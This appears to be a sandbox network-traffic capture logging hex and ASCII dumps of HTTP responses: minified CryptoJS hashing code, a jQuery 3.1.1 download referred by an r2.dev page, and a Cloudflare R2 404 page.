2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 Data Ascii: rse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?l.ceil(s):l.max((0\|s)-this._minBufferSize,0))o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doP
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 32 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e Data Ascii: 255===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 39 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a Data Ascii: 92+(e[4]>>>0<wt[4]>>>0?1:0)\|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)\|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)\|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((nn>>>17)+no>>>15)+oo,c=((4294901760&i)
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 Data Ascii: >>6-o%42,a=s\|c;i[n>>>2]\|=a<<24-n%48,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=429
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 Data Ascii: ,S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[3
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e Data Ascii: .clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r\|~e&i)+n+s;return(c<<o\|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i\|r&~i)+n+s;return(c<<o\|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c Data Ascii: o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0\|t))\|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:19 UTC	561	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:19 UTC	569	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 3230024 Date: Thu, 18 Apr 2024 17:39:19 GMT X-Served-By: cache-lga21947-LGA, cache-pdk-kfty2130056-PDK X-Cache: HIT, HIT X-Cache-Hits: 4941, 0 X-Timer: S1713461959.180832,VS0,VE1 Vary: Accept-Encoding
2024-04-18 17:39:19 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2024-04-18 17:39:19 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2024-04-18 17:39:19 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2024-04-18 17:39:19 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2024-04-18 17:39:19 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2024-04-18 17:39:19 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Timestamp	Bytes transferred	Direction	Data
2024-04-18 17:39:19 UTC	652	OUT	GET /favicon.ico HTTP/1.1 Host: pub-06c7664497d24b6cb36a093c4426dcca.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-06c7664497d24b6cb36a093c4426dcca.r2.dev/index.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 17:39:19 UTC	180	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 17:39:19 GMT Content-Type: text/html Content-Length: 27242 Connection: close Server: cloudflare CF-RAY: 87666efecb88135b-ATL
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 31 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 31 20 33 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 73 76 67 20 3e 20 2e 65 79 65 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 65 79 65 2d 32 20 33 73 20 30 2e 36 73 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a Data Ascii: teX(0); } 100% { transform: translateX(0px); } } svg > .eye-1 { animation: eye-1 3s infinite; } svg > .eye-2 { animation: eye-2 3s 0.6s infinite; } h1 { font-siz
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 34 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 31 Data Ascii: s://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <section> <svg width="414" height="212" viewBox="0 0 41
2024-04-18 17:39:19 UTC	1369	IN	Data Raw: 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 32 2e 36 39 32 20 31 30 2e 32 33 34 37 48 31 32 36 2e 34 30 32 56 32 34 2e 30 33 34 35 48 31 32 32 2e 36 39 32 56 31 Data Ascii: .204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC" /> <path d="M122.692 10.2347H126.402V24.0345H122.692V1
